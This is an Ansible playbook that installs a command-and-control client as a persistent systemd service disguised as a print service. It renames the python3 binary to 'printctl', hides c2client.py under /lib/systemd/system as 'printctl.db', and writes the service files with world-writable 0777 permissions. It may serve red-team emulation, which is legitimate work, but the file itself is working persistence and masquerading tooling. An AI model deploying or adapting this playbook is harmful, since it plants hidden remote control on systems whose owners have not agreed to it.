---
- name: Add cronjob to place service config and start service
  hosts: all
  become: yes
  tasks:
    - name: Update the package manager cache (Debian-based systems)
      apt:
        update_cache: yes
    - name: Install Python 3 on Debian-based systems
      apt:
        name: python3
        state: present
    - name: Copy python3 binary to new name
      command: cp /usr/bin/python3 /usr/bin/printctl
    - name: Copy service config file to /lib/systemd/system
      copy:
        src: printserv.service
        dest: /lib/systemd/system/printserv.service
        owner: root
        group: root
        mode: '0777'
    - name: Copy service config file to /etc/systemd/system
      copy:
        src: printserv.service
        dest: /etc/systemd/system/printserv.service
        owner: root
        group: root
        mode: '0777'
    - name: Copy c2client script to /lib/systemd/system
      copy:
        src: c2client.py
        dest: /lib/systemd/system/printctl.db
        owner: root
        group: root
        mode: '0777'
    - name: Reload systemd daemon
      command: systemctl daemon-reload
      notify:
        - restart service
    - name: Ensure the service is enabled
      systemd:
        name: printserv
        enabled: yes
        state: started

  handlers:
    - name: restart service
      systemd:
        name: printserv
        state: restarted
